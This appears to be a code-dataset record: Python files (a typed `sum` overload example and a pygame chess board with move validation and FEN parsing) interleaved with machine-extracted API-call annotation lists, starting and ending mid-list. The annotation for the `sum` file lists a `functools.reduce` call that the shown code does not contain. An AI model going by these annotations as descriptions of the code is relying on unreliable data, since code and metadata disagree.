(['KUHN_POKER_GAME_FILE_PATH', '"""strategies/kuhn.limit.2p-equilibrium.strategy"""'], {}), "(KUHN_POKER_GAME_FILE_PATH,\n 'strategies/kuhn.limit.2p-equilibrium.strategy')\n", (1735, 1815), False, 'from tools.io_util import read_strategy_from_file\n'), ((1853, 1899), 
'acpc_python_client.read_game_file', 'acpc.read_game_file', (['KUHN_POKER_GAME_FILE_PATH'], {}), '(KUHN_POKER_GAME_FILE_PATH)\n', (1872, 1899), True, 'import acpc_python_client as acpc\n'), ((1925, 1945), 'evaluation.exploitability.Exploitability', 'Exploitability', (['game'], {}), '(game)\n', (1939, 1945), False, 'from evaluation.exploitability import Exploitability\n'), ((1979, 2104), 'weak_agents.action_tilted_agent.create_agent_strategy_from_trained_strategy', 'create_agent_strategy_from_trained_strategy', (['KUHN_POKER_GAME_FILE_PATH', 'kuhn_equilibrium', 'Action.RAISE', 'TiltType.ADD', '(0.2)'], {}), '(KUHN_POKER_GAME_FILE_PATH,\n kuhn_equilibrium, Action.RAISE, TiltType.ADD, 0.2)\n', (2022, 2104), False, 'from weak_agents.action_tilted_agent import create_agent_strategy, create_agent_strategy_from_trained_strategy, TiltType\n'), ((2657, 2760), 'tools.io_util.read_strategy_from_file', 'read_strategy_from_file', (['KUHN_POKER_GAME_FILE_PATH', '"""strategies/kuhn.limit.2p-equilibrium.strategy"""'], {}), "(KUHN_POKER_GAME_FILE_PATH,\n 'strategies/kuhn.limit.2p-equilibrium.strategy')\n", (2680, 2760), False, 'from tools.io_util import read_strategy_from_file\n'), ((2798, 2844), 'acpc_python_client.read_game_file', 'acpc.read_game_file', (['KUHN_POKER_GAME_FILE_PATH'], {}), '(KUHN_POKER_GAME_FILE_PATH)\n', (2817, 2844), True, 'import acpc_python_client as acpc\n'), ((2870, 2890), 'evaluation.exploitability.Exploitability', 'Exploitability', (['game'], {}), '(game)\n', (2884, 2890), False, 'from evaluation.exploitability import Exploitability\n'), ((2924, 3049), 'weak_agents.action_tilted_agent.create_agent_strategy_from_trained_strategy', 'create_agent_strategy_from_trained_strategy', (['KUHN_POKER_GAME_FILE_PATH', 'kuhn_equilibrium', 'Action.CALL', 'TiltType.ADD', '(-0.5)'], {}), '(KUHN_POKER_GAME_FILE_PATH,\n kuhn_equilibrium, Action.CALL, TiltType.ADD, -0.5)\n', (2967, 3049), False, 'from weak_agents.action_tilted_agent import create_agent_strategy, 
create_agent_strategy_from_trained_strategy, TiltType\n'), ((867, 896), 'tools.game_utils.is_correct_strategy', 'is_correct_strategy', (['strategy'], {}), '(strategy)\n', (886, 896), False, 'from tools.game_utils import is_strategies_equal, is_correct_strategy\n'), ((1231, 1260), 'tools.game_utils.is_correct_strategy', 'is_correct_strategy', (['strategy'], {}), '(strategy)\n', (1250, 1260), False, 'from tools.game_utils import is_strategies_equal, is_correct_strategy\n'), ((1605, 1634), 'tools.game_utils.is_correct_strategy', 'is_correct_strategy', (['strategy'], {}), '(strategy)\n', (1624, 1634), False, 'from tools.game_utils import is_strategies_equal, is_correct_strategy\n'), ((2186, 2228), 'tools.game_utils.is_correct_strategy', 'is_correct_strategy', (['tilted_agent_strategy'], {}), '(tilted_agent_strategy)\n', (2205, 2228), False, 'from tools.game_utils import is_strategies_equal, is_correct_strategy\n'), ((3131, 3173), 'tools.game_utils.is_correct_strategy', 'is_correct_strategy', (['tilted_agent_strategy'], {}), '(tilted_agent_strategy)\n', (3150, 3173), False, 'from tools.game_utils import is_strategies_equal, is_correct_strategy\n'), ((2258, 2318), 'tools.game_utils.is_strategies_equal', 'is_strategies_equal', (['kuhn_equilibrium', 'tilted_agent_strategy'], {}), '(kuhn_equilibrium, tilted_agent_strategy)\n', (2277, 2318), False, 'from tools.game_utils import is_strategies_equal, is_correct_strategy\n'), ((3203, 3263), 'tools.game_utils.is_strategies_equal', 'is_strategies_equal', (['kuhn_equilibrium', 'tilted_agent_strategy'], {}), '(kuhn_equilibrium, tilted_agent_strategy)\n', (3222, 3263), False, 'from tools.game_utils import is_strategies_equal, is_correct_strategy\n')] |
import functools
import operator
from collections.abc import Iterable
from typing import overload, Union, TypeVar
T = TypeVar('T')
S = TypeVar('S')  # <1>

@overload
def sum(it: Iterable[T]) -> Union[T, int]: ...  # <2>
@overload
def sum(it: Iterable[T], /, start: S) -> Union[T, S]: ...  # <3>
def sum(it, /, start=0):  # <4>
    """Left-fold *it* with ``+``, seeded with *start* (like builtins.sum)."""
    total = start
    for item in it:
        total = total + item
    return total
| [
"functools.reduce",
"typing.TypeVar"
] | [((119, 131), 'typing.TypeVar', 'TypeVar', (['"""T"""'], {}), "('T')\n", (126, 131), False, 'from typing import overload, Union, TypeVar\n'), ((136, 148), 'typing.TypeVar', 'TypeVar', (['"""S"""'], {}), "('S')\n", (143, 148), False, 'from typing import overload, Union, TypeVar\n'), ((339, 380), 'functools.reduce', 'functools.reduce', (['operator.add', 'it', 'start'], {}), '(operator.add, it, start)\n', (355, 380), False, 'import functools\n')] |
from __future__ import annotations
import math
from collections import deque
from typing import Optional, Callable
import numpy as np
import pygame
from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, \
PIECE_INDICES, init_zobrist, MoveFlags, GameState
from chess.utils import load_image, load_font
class Chessboard:
"""Chessboard interface (8x8 field)"""
    def __init__(self, light_colour="#F0D9B5", dark_colour="#B58863") -> None:
        """Set up an empty board, rendering colours and hashing tables.

        :param light_colour: hex colour of the light squares
        :param dark_colour: hex colour of the dark squares
        NOTE(review): castling rights start as False for both sides —
        presumably enabled later by whatever loads the starting position;
        confirm against the position-loading code.
        """
        # Board itself
        self._board = np.array([Piece.empty()] * 64)
        # Active colour
        self._active_colour = PieceColour.White
        # Castling rights
        self._castling_rights = {
            PieceColour.White: {
                CastlingType.KingSide: False,
                CastlingType.QueenSide: False
            },
            PieceColour.Black: {
                CastlingType.KingSide: False,
                CastlingType.QueenSide: False
            }
        }
        # Store piece types as strings (used to build sprite file names)
        self._get_piece_str = {PieceType.Pawn: "pawn",
                               PieceType.Knight: "knight",
                               PieceType.Bishop: "bishop",
                               PieceType.Rook: "rook",
                               PieceType.Queen: "queen",
                               PieceType.King: "king"}
        # Store piece move validators (geometry-only checks)
        self._get_validator: dict[
            PieceType, Callable[[int, int, int, int], bool]] \
            = {PieceType.Pawn: self._can_pawn_make,
               PieceType.Knight: self._can_knight_make,
               PieceType.Bishop: self._can_bishop_make,
               PieceType.Rook: self._can_rook_make,
               PieceType.Queen: self._can_queen_make,
               PieceType.King: self._can_king_make}
        # En Passant target (square index, or None when not available)
        self._en_passant_target: Optional[int] = None
        # Half-move clock
        self._halfmoves = 0
        # Init zobrist hash keys for position hashing
        self._z_table = init_zobrist()
        # Board appearance
        self._light_colour = pygame.Color(light_colour)
        self._dark_colour = pygame.Color(dark_colour)
        self._light_complementary = pygame.Color("#DBAB84")
        self._dark_complementary = pygame.Color("#DBC095")
        self._move_colour = pygame.Color("#8D80AD")
        self._bg_colour = pygame.Color("#443742")
        self._side = 100  # square side length, px
        self._font_size = 45
        self._font_gap = 15
        self._font = load_font("ubuntumono/UbuntuMono-R.ttf", self._font_size)
        self._font_colour = pygame.Color("white")
    @property
    def board(self) -> np.ndarray:
        """The raw 64-element array of Piece objects (row-major, 8x8)."""
        return self._board
    @property
    def halfmoves(self) -> int:
        """Number of half-moves played so far (incremented in make_move)."""
        return self._halfmoves
    @property
    def active_colour(self) -> PieceColour:
        """Colour of the side to move."""
        return self._active_colour
@property
def passive_colour(self) -> PieceColour:
return PieceColour.White if self._active_colour == PieceColour.Black else PieceColour.Black
    def hash(self) -> int:
        """Return the Zobrist hash of the current position.

        XORs a precomputed random key for every occupied square; empty
        squares contribute nothing.
        NOTE(review): side to move, castling rights and en-passant are
        not folded in, so positions differing only in those collide.
        """
        h = 0
        for i in range(64):
            piece = self._board[i]
            if piece.Type != PieceType.Empty:
                # Key index is derived from the combined type|colour value.
                j = PIECE_INDICES[piece.Type.value | piece.Colour.value]
                h ^= self._z_table[i][j]
        return h
def set_colours(self, light_colour: str, dark_colour: str,
light_complementary: str, dark_complementary: str) -> None:
self._light_colour = pygame.Color(light_colour)
self._dark_colour = pygame.Color(dark_colour)
self._light_complementary = pygame.Color(light_complementary)
self._dark_complementary = pygame.Color(dark_complementary)
    def render(self, screen: pygame.Surface,
               last_move=None, skip=None, pos=None, game_info=None) -> None:
        """Render chessboard.

        :param screen: target pygame surface
        :param last_move: highlight its From/To squares if given
        :param skip: (x, y) of a piece being dragged; drawn at *pos*
            instead of its square
        :param pos: pixel position of the dragged piece (required if
            skip is given)
        :param game_info: optional (score, time, positions, depth) tuple
            shown in the side panel
        """
        if skip is not None and pos is None:
            raise ValueError("skip is not None but pos is None")
        screen.fill(self._bg_colour)
        group = pygame.sprite.Group()
        grabbed_data = None
        skip: Optional[tuple[int]]
        # Destination squares of the grabbed piece, for move highlighting.
        can_move_now = None if skip is None else self._get_all_piece_moves(skip[0] + skip[1] * 8)
        for i, piece in enumerate(self._board):
            x, y = i % 8, i // 8
            # Square background: move targets, last-move From/To, or the
            # normal light/dark checker pattern.
            if pos is not None and i in can_move_now:
                pygame.draw.rect(screen, self._move_colour,
                                 (x * self._side, y * self._side,
                                  self._side, self._side))
            elif last_move is not None and last_move.From == i:
                pygame.draw.rect(screen, self._light_complementary,
                                 (x * self._side, y * self._side,
                                  self._side, self._side))
            elif last_move is not None and last_move.To == i or (x, y) == skip:
                pygame.draw.rect(screen, self._dark_complementary,
                                 (x * self._side, y * self._side,
                                  self._side, self._side))
            else:
                if (x + y) % 2 == 0:
                    colour = self._light_colour
                else:
                    colour = self._dark_colour
                pygame.draw.rect(screen, colour,
                                 (x * self._side, y * self._side,
                                  self._side, self._side))
            if piece.Type == PieceType.Empty:
                continue
            elif (x, y) == skip:
                # Defer the dragged piece so it is drawn last (on top).
                grabbed_data = f"{self._get_piece_str[piece.Type]}_" \
                               f"{'w' if piece.Colour == PieceColour.White else 'b'}.png", i, group
            else:
                PieceSprite(
                    f"{self._get_piece_str[piece.Type]}_"
                    f"{'w' if piece.Colour == PieceColour.White else 'b'}"
                    f".png", i, group)
        if grabbed_data is not None:
            grabbed_piece = PieceSprite(*grabbed_data)
            # Centre the 100px sprite on the cursor.
            grabbed_piece.rect.x = pos[0] - 50  # type: ignore
            grabbed_piece.rect.y = pos[1] - 50  # type: ignore
        group.draw(screen)
        # Side panel: whose turn it is, plus optional search statistics.
        text = ["Ход " + ("белых"
                          if self._active_colour == PieceColour.White
                          else "чёрных")]
        if game_info is not None:
            text.extend([f"Оценка: {game_info[0]}",
                         f"Позиций: {game_info[2]}",
                         f"Глубина: {game_info[3]}",
                         f"Время: {game_info[1]}с"])
        # Vertically centre the text column in the 400px panel at x=800.
        line_pos = (screen.get_rect().h -
                    len(text) * (self._font_size + self._font_gap) -
                    self._font_gap) // 2
        for line in text:
            line_rendered = self._font.render(line, True, self._font_colour)
            l_rect = line_rendered.get_rect()
            screen.blit(line_rendered, (800 + (400 - l_rect.w) // 2, line_pos))
            line_pos += self._font_size + self._font_gap
def at(self, x: int, y: int) -> Piece:
"""Get piece from position on the board"""
if 0 <= x <= 7 and 0 <= y <= 7:
return self._board[x + y * 8]
return Piece.empty()
def toggle_state(self) -> GameState:
"""Return game state after active colour move"""
other_colour = PieceColour.Black \
if self._active_colour == PieceColour.White \
else PieceColour.White
self._active_colour = other_colour
if self.get_all_moves(other_colour):
return GameState.Continue
elif self.king_is_safe(other_colour):
return GameState.Stalemate
else:
return GameState.Checkmate
    def _force_can_make(self, move: Move) -> Optional[Move]:
        """
        Check if the move is correct with adding corresponding flags
        (!) Without checking king safety and turn order

        Returns the move with its Flags filled in (castling performed,
        castling rights lost, pawn promotion), or None when illegal.
        """
        # Can't make incorrect move: the recorded capture must match the
        # piece actually standing on the target square.
        if move.Captured != self._board[move.To]:
            return None
        this_piece: Piece = self._board[move.From]
        other_piece: Piece = self._board[move.To]
        # Can't make move w/o piece itself
        if this_piece.Type == PieceType.Empty:
            return None
        # Can't eat pieces of your colour
        if other_piece.Type != PieceType.Empty and \
                other_piece.Colour == this_piece.Colour:
            return None
        # Resolving piece xy coordinates to calculate move possibility
        y1, y2 = move.From // 8, move.To // 8
        x1, x2 = move.From % 8, move.To % 8
        # Castling: a king sliding two files on its own rank.
        if this_piece.Type == PieceType.King and \
                y1 == y2 and abs(x1 - x2) == 2 \
                and move.Captured == Piece.empty():
            castling = CastlingType.QueenSide if x1 - x2 == 2 \
                else CastlingType.KingSide
            # Every square between king and rook must be empty.
            if castling == CastlingType.QueenSide and (
                    self._board[move.To - 1] != Piece.empty() or
                    self._board[move.From - 1] != Piece.empty() or
                    self._board[move.From - 2] != Piece.empty()):
                return None
            elif castling == CastlingType.KingSide and (
                    self._board[move.From + 1] != Piece.empty() or
                    self._board[move.From + 2] != Piece.empty()):
                return None
            if self._castling_rights[this_piece.Colour][castling]:
                # Castling consumes the right on this side, and also on
                # the other side if it was still available.
                lost_castling = {castling}
                other_side = CastlingType.KingSide \
                    if castling == CastlingType.QueenSide \
                    else CastlingType.QueenSide
                if self._castling_rights[this_piece.Colour][other_side]:
                    lost_castling.add(other_side)
                move.Flags = MoveFlags(Castling=castling,
                                       LoseCastling=lost_castling)
            else:
                return None
        elif this_piece.Type == PieceType.King:
            # Losing castling rights after king move
            lost_castling = set()
            if self._castling_rights[this_piece.Colour][CastlingType.KingSide]:
                lost_castling.add(CastlingType.KingSide)
            if self._castling_rights[this_piece.Colour][CastlingType.QueenSide]:
                lost_castling.add(CastlingType.QueenSide)
            move.Flags = MoveFlags(LoseCastling=lost_castling)
        elif this_piece.Type == PieceType.Rook:
            # Losing castling rights after rook move (file 0 = queen's
            # rook, file 7 = king's rook)
            if x1 == 0 and self._castling_rights[this_piece.Colour][CastlingType.QueenSide]:
                move.Flags = MoveFlags(LoseCastling={CastlingType.QueenSide})
            elif x1 == 7 and self._castling_rights[this_piece.Colour][CastlingType.KingSide]:
                move.Flags = MoveFlags(LoseCastling={CastlingType.KingSide})
        elif this_piece.Type == PieceType.Pawn and 0 <= move.To <= 7:
            # Pawn reaching the back rank is auto-promoted to a queen.
            # NOTE(review): only rank 0 triggers promotion — presumably
            # only one colour promotes here; confirm against move
            # generation for the other colour.
            move.Flags = MoveFlags(PawnPromotion=PieceType.Queen)
        # Finally check the piece's movement geometry.
        if self._get_validator[this_piece.Type](x1, y1, x2, y2):
            return move
        return None
    def can_make(self, move: Move) -> Optional[Move]:
        """Check if the move is fully legal.

        Combines the geometric/flag check of _force_can_make with a king
        safety check done by temporarily playing the move on the board.
        Returns the flag-completed move, or None when illegal.
        """
        # Checking basic move correctness
        completed_move = self._force_can_make(move)
        if completed_move is not None:
            # Can't capture the king
            if self._board[move.To].Type == PieceType.King:
                return None
            # Checking king safety: play the move, test, then undo it.
            self.make_move(move)
            safety = self.king_is_safe(self._board[move.To].Colour)
            self.unmake_move(move)
            return completed_move if safety else None
        return None
    def make_move(self, move: Move) -> None:
        """
        Make move on the board
        Use board.make_move() to check if move is correct

        Applies the move's side effects: castling-right removal, pawn
        promotion and the rook shift of a castling move.
        """
        # Removing castling rights
        if move.Flags.LoseCastling is not None:
            this_colour = self._board[move.From].Colour
            for castling in move.Flags.LoseCastling:
                self._castling_rights[this_colour][castling] = False
        # Moving piece
        self._halfmoves += 1
        self._board[move.To] = self._board[move.From]
        self._board[move.From] = Piece.empty()
        if move.Flags.PawnPromotion is not None:
            # Replace the arriving pawn with the promoted piece type.
            self._board[move.To] = Piece(move.Flags.PawnPromotion,
                                         self._board[move.To].Colour)
        # Doing castling: also move the matching rook next to the king.
        if move.Flags.Castling is not None:
            if move.Flags.Castling == CastlingType.KingSide:
                self._board[move.From + 1] = self._board[move.To + 1]
                self._board[move.To + 1] = Piece.empty()
            else:
                self._board[move.From - 1] = self._board[move.To - 2]
                self._board[move.To - 2] = Piece.empty()
    def unmake_move(self, move: Move) -> None:
        """Unmake move on the board (no additional checking).

        Exact inverse of make_move: restores castling rights, the
        captured piece, a promoted pawn and a castled rook.
        """
        # Returning castling rights
        if move.Flags.LoseCastling is not None:
            this_colour = self._board[move.To].Colour
            for castling in move.Flags.LoseCastling:
                self._castling_rights[this_colour][castling] = True
        # Unmoving piece
        self._halfmoves -= 1
        self._board[move.From] = self._board[move.To]
        self._board[move.To] = move.Captured
        # Demoting pawn back from the promoted piece
        if move.Flags.PawnPromotion is not None:
            self._board[move.From] = Piece(PieceType.Pawn,
                                           self._board[move.From].Colour)
        # Undoing castling: put the rook back in its corner.
        if move.Flags.Castling is not None:
            if move.Flags.Castling == CastlingType.KingSide:
                self._board[move.To + 1] = self._board[move.From + 1]
                self._board[move.From + 1] = Piece.empty()
            else:
                self._board[move.To - 2] = self._board[move.From - 1]
                self._board[move.From - 1] = Piece.empty()
def get_all_moves(self, colour: PieceColour, no_castling=False) -> deque[Move]:
moves: deque[Move] = deque()
for i, piece_from in enumerate(self._board):
if piece_from.Type == PieceType.Empty or \
piece_from.Colour != colour:
continue
for j, piece_to in enumerate(self._board):
move = self.can_make(Move(i, j, piece_to))
if move is not None and (not no_castling or move.Flags.Castling is None):
moves.append(move)
return moves
def _get_all_piece_moves(self, pos: int) -> deque[int]:
moves: deque[int] = deque()
for i, piece_to in enumerate(self._board):
move = self.can_make(Move(pos, i, piece_to))
if move is not None:
moves.append(move.To)
return moves
    def king_is_safe(self, colour: PieceColour) -> bool:
        """Check if king is safe on current board state.

        Scans outward from the king: ranks/files for rooks/queens,
        diagonals for bishops/queens, then the fixed pawn, knight and
        king attack patterns. Returns False as soon as an attacker of
        the opposite colour is found.
        """
        king_pos = np.where(self._board == Piece(PieceType.King, colour))[0][0]
        king_x, king_y = king_pos % 8, king_pos // 8
        right_side = range(king_x + 1, 8)
        left_side = range(king_x - 1, -1, -1)
        bottom_side = range(king_y + 1, 8)
        top_side = range(king_y - 1, -1, -1)
        o_colour = PieceColour.White if \
            colour == PieceColour.Black else PieceColour.Black
        # Opponent piece templates compared against board squares below.
        o_pawn = Piece(PieceType.Pawn, o_colour)
        o_knight = Piece(PieceType.Knight, o_colour)
        o_bishop = Piece(PieceType.Bishop, o_colour)
        o_rook = Piece(PieceType.Rook, o_colour)
        o_queen = Piece(PieceType.Queen, o_colour)
        o_king = Piece(PieceType.King, o_colour)

        # Horizontal and vertical: walk one ray; the first non-empty
        # square blocks it, and attacks only if it is a rook/queen.
        def _line(iter_side: range, const_x: bool) -> bool:
            for component in iter_side:
                attacking_piece = self.at(king_x, component) \
                    if const_x \
                    else self.at(component, king_y)
                if attacking_piece.Type != PieceType.Empty:
                    if attacking_piece == o_rook or \
                            attacking_piece == o_queen:
                        return True
                    return False
            return False

        if _line(right_side, False) or _line(left_side, False) or \
                _line(top_side, True) or _line(bottom_side, True):
            return False

        # All diagonals: same ray walk, attacker is a bishop/queen.
        def _diagonal(iter_side_x: range, iter_side_y: range) -> bool:
            for x, y in zip(iter_side_x, iter_side_y):
                attacking_piece = self.at(x, y)
                if attacking_piece.Type != PieceType.Empty:
                    if attacking_piece == o_bishop or \
                            attacking_piece == o_queen:
                        return True
                    return False
            return False

        if _diagonal(right_side, bottom_side) or \
                _diagonal(left_side, bottom_side) or \
                _diagonal(right_side, top_side) or \
                _diagonal(left_side, top_side):
            return False
        # Pawns: attack one rank toward the enemy, one file to the side.
        sign_ = -1 if colour == PieceColour.White else 1
        if self.at(king_x + 1, king_y + sign_) == o_pawn or \
                self.at(king_x - 1, king_y + sign_) == o_pawn:
            return False
        # Knight: all eight L-shaped squares (self.at handles off-board).
        if self.at(king_x + 1, king_y + 2) == o_knight or \
                self.at(king_x - 1, king_y + 2) == o_knight or \
                self.at(king_x + 2, king_y + 1) == o_knight or \
                self.at(king_x - 2, king_y + 1) == o_knight or \
                self.at(king_x + 1, king_y - 2) == o_knight or \
                self.at(king_x - 1, king_y - 2) == o_knight or \
                self.at(king_x + 2, king_y - 1) == o_knight or \
                self.at(king_x - 2, king_y - 1) == o_knight:
            return False
        # King: adjacency of the two kings is also unsafe.
        opponent_king_pos = np.where(self._board == o_king)[0][0]
        if self._can_king_make(opponent_king_pos % 8,
                               opponent_king_pos // 8,
                               king_x, king_y):
            return False
        return True
def _can_pawn_make(self, x1: int, y1: int, x2: int, y2: int) -> bool:
"""Check if pawn can make move"""
direction = -1 if \
self._board[y1 * 8 + x1].Colour == PieceColour.White \
else 1
to_capture = self._board[y2 * 8 + x2].Type != PieceType.Empty
dx = abs(x2 - x1)
if y2 - y1 == direction and \
((dx == 1 and to_capture) or (dx == 0 and not to_capture)):
return True
return (not to_capture and
(y1 == 1 or y1 == 6) and
y2 - y1 == direction * 2 and
dx == 0 and self._board[y1 * 8 + x1 + direction * 8].Type ==
PieceType.Empty)
@staticmethod
def _can_knight_make(x1: int, y1: int, x2: int, y2: int) -> bool:
"""Check if knight can make move"""
dx, dy = abs(x2 - x1), abs(y2 - y1)
return dx == 1 and dy == 2 or dx == 2 and dy == 1
def _can_bishop_make(self, x1: int, y1: int, x2: int, y2: int) -> bool:
"""Check if bishop can make move"""
return (abs(x1 - x2) == abs(y1 - y2)) and self._diagonal_is_free(
x1, y1, x2, y2)
def _can_rook_make(self, x1: int, y1: int, x2: int, y2: int) -> bool:
"""Check if rook can make move"""
return self._horizontal_is_free(x1, y1, x2, y2) \
if y1 == y2 else self._vertical_is_free(x1, y1, x2, y2) \
if x1 == x2 else False
def _can_queen_make(self, x1: int, y1: int, x2: int, y2: int) -> bool:
"""Check if queen can make move"""
return \
self._can_bishop_make(x1, y1, x2, y2) or \
self._can_rook_make(x1, y1, x2, y2)
@staticmethod
def _can_king_make(x1: int, y1: int, x2: int, y2: int) -> bool:
"""Check if king can make move"""
return (abs(x2 - x1) < 2 and abs(y2 - y1) < 2) or \
(abs(x1 - x2) == 2 and y1 == y2)
def _diagonal_is_free(self, x1: int, y1: int, x2: int, y2: int) -> bool:
"""Check if diagonal is free (not included end points)"""
sign_x = int(math.copysign(1, x2 - x1))
sign_y = int(math.copysign(1, y2 - y1))
for x, y in zip(range(x1 + sign_x, x2, sign_x),
range(y1 + sign_y, y2, sign_y)):
if self._board[y * 8 + x].Type != PieceType.Empty:
return False
return True
def _horizontal_is_free(self, x1: int, y1: int, x2: int, _: int) -> bool:
"""Check if horizontal is free (not included end points)"""
sign = int(math.copysign(1, x2 - x1))
for x in range(x1 + sign, x2, sign):
if self._board[y1 * 8 + x].Type != PieceType.Empty:
return False
return True
def _vertical_is_free(self, x1: int, y1: int, _: int, y2: int) -> bool:
"""Check if vertical is free (not included end points)"""
sign = int(math.copysign(1, y2 - y1))
for y in range(y1 + sign, y2, sign):
if self._board[y * 8 + x1].Type != PieceType.Empty:
return False
return True
@classmethod
def _parse_fen(cls, fen_string: str) -> Chessboard:
"""
Parse FEN string,
use Chessboard.from_fen() instead
"""
# Setup
error_info = f"Invalid FEN string: {fen_string}"
tmp_board = cls()
fen_dict = {"p": PieceType.Pawn,
"n": PieceType.Knight,
"b": PieceType.Bishop,
"r": PieceType.Rook,
"q": PieceType.Queen,
"k": PieceType.King}
fields = fen_string.split()
assert len(fields) == 6, error_info
tmp_position = 0
# Parse First field (Piece Placement)
for sym in fields[0]:
if sym == "/":
assert tmp_position % 8 == 0, error_info
continue
if sym.isdigit():
tmp_position += int(sym)
assert tmp_position < 65, error_info
continue
assert sym.lower() in fen_dict, error_info
clr = PieceColour.White if sym.isupper() else PieceColour.Black
type_ = fen_dict[sym.lower()]
tmp_board._board[tmp_position] = Piece(type_, clr)
tmp_position += 1
assert tmp_position == 64, error_info
# Parse Second Field (Active Color)
if fields[1] == "b":
tmp_board._active_colour = PieceColour.Black
elif fields[1] == "w":
tmp_board._active_colour = PieceColour.White
else:
assert False, error_info
# Parse Third field (Castling Rights)
if fields[2] != "-":
for castling in fields[2]:
if castling.lower() == "q":
tmp_board._castling_rights[
PieceColour.White if castling.isupper()
else PieceColour.Black][CastlingType.QueenSide] = True
elif castling.lower() == "k":
tmp_board._castling_rights[
PieceColour.White if castling.isupper()
else PieceColour.Black][CastlingType.KingSide] = True
else:
assert False, error_info
# Parse Fourth field (Possible En Passant Targets)
alg_cell = fields[3]
if alg_cell != "-":
assert len(alg_cell) == 2, error_info
assert 96 < ord(alg_cell[0]) < 105, error_info
assert alg_cell[1].isdigit() and 0 < int(alg_cell[1]) < 9
tmp_board._en_passant_target = int(
(8 - int(alg_cell[1])) * 8 + ord(alg_cell[0]) - 97)
# Parse Fifth field (Full-move Number)
assert fields[4].isnumeric()
# Parse Sixth field (Half-move Clock)
assert fields[5].isnumeric() and int(fields[5]) >= 0, error_info
tmp_board._halfmoves = int(fields[5])
return tmp_board
@classmethod
def from_fen(cls, fen_string: str) -> Chessboard:
"""Create Chessboard using FEN"""
try:
return cls._parse_fen(fen_string)
except AssertionError as e:
raise ValueError(str(e))
@classmethod
def from_state(cls, state: np.ndarray) -> Chessboard:
"""Create Chessboard using state"""
tmp_board = cls()
tmp_board._board = state
return tmp_board
class PieceSprite(pygame.sprite.Sprite):
    """Piece class for drawing on a board"""

    def __init__(self, sprite_img: str, pos: int,
                 *groups: pygame.sprite.AbstractGroup):
        super().__init__(*groups)
        # Load the piece image and place it on its starting square.
        self.image = load_image(sprite_img)
        self.rect = self.image.get_rect()
        self.move_sprite(pos)

    def move_sprite(self, position: int) -> None:
        """Move the sprite to the 0-63 board index *position*."""
        # Each square is 100x100 pixels; row-major board layout.
        row, col = divmod(position, 8)
        self.rect.x = col * 100  # type: ignore
        self.rect.y = row * 100  # type: ignore
| [
"chess.utils.load_image",
"collections.deque",
"numpy.where",
"pygame.sprite.Group",
"chess.const.Move",
"chess.const.Piece.empty",
"math.copysign",
"chess.const.MoveFlags",
"pygame.draw.rect",
"pygame.Color",
"chess.utils.load_font",
"chess.const.Piece",
"chess.const.init_zobrist"
] | [((1993, 2007), 'chess.const.init_zobrist', 'init_zobrist', ([], {}), '()\n', (2005, 2007), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((2064, 2090), 'pygame.Color', 'pygame.Color', (['light_colour'], {}), '(light_colour)\n', (2076, 2090), False, 'import pygame\n'), ((2119, 2144), 'pygame.Color', 'pygame.Color', (['dark_colour'], {}), '(dark_colour)\n', (2131, 2144), False, 'import pygame\n'), ((2181, 2204), 'pygame.Color', 'pygame.Color', (['"""#DBAB84"""'], {}), "('#DBAB84')\n", (2193, 2204), False, 'import pygame\n'), ((2240, 2263), 'pygame.Color', 'pygame.Color', (['"""#DBC095"""'], {}), "('#DBC095')\n", (2252, 2263), False, 'import pygame\n'), ((2292, 2315), 'pygame.Color', 'pygame.Color', (['"""#8D80AD"""'], {}), "('#8D80AD')\n", (2304, 2315), False, 'import pygame\n'), ((2342, 2365), 'pygame.Color', 'pygame.Color', (['"""#443742"""'], {}), "('#443742')\n", (2354, 2365), False, 'import pygame\n'), ((2475, 2532), 'chess.utils.load_font', 'load_font', (['"""ubuntumono/UbuntuMono-R.ttf"""', 'self._font_size'], {}), "('ubuntumono/UbuntuMono-R.ttf', self._font_size)\n", (2484, 2532), False, 'from chess.utils import load_image, load_font\n'), ((2561, 2582), 'pygame.Color', 'pygame.Color', (['"""white"""'], {}), "('white')\n", (2573, 2582), False, 'import pygame\n'), ((3447, 3473), 'pygame.Color', 'pygame.Color', (['light_colour'], {}), '(light_colour)\n', (3459, 3473), False, 'import pygame\n'), ((3502, 3527), 'pygame.Color', 'pygame.Color', (['dark_colour'], {}), '(dark_colour)\n', (3514, 3527), False, 'import pygame\n'), ((3564, 3597), 'pygame.Color', 'pygame.Color', (['light_complementary'], {}), '(light_complementary)\n', (3576, 3597), False, 'import pygame\n'), ((3633, 3665), 'pygame.Color', 'pygame.Color', (['dark_complementary'], {}), '(dark_complementary)\n', (3645, 3665), False, 'import pygame\n'), ((3984, 4005), 'pygame.sprite.Group', 'pygame.sprite.Group', 
([], {}), '()\n', (4003, 4005), False, 'import pygame\n'), ((7122, 7135), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (7133, 7135), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((12173, 12186), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (12184, 12186), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((14027, 14034), 'collections.deque', 'deque', ([], {}), '()\n', (14032, 14034), False, 'from collections import deque\n'), ((14570, 14577), 'collections.deque', 'deque', ([], {}), '()\n', (14575, 14577), False, 'from collections import deque\n'), ((15326, 15357), 'chess.const.Piece', 'Piece', (['PieceType.Pawn', 'o_colour'], {}), '(PieceType.Pawn, o_colour)\n', (15331, 15357), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((15377, 15410), 'chess.const.Piece', 'Piece', (['PieceType.Knight', 'o_colour'], {}), '(PieceType.Knight, o_colour)\n', (15382, 15410), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((15430, 15463), 'chess.const.Piece', 'Piece', (['PieceType.Bishop', 'o_colour'], {}), '(PieceType.Bishop, o_colour)\n', (15435, 15463), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((15481, 15512), 'chess.const.Piece', 'Piece', (['PieceType.Rook', 'o_colour'], {}), '(PieceType.Rook, o_colour)\n', (15486, 15512), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, 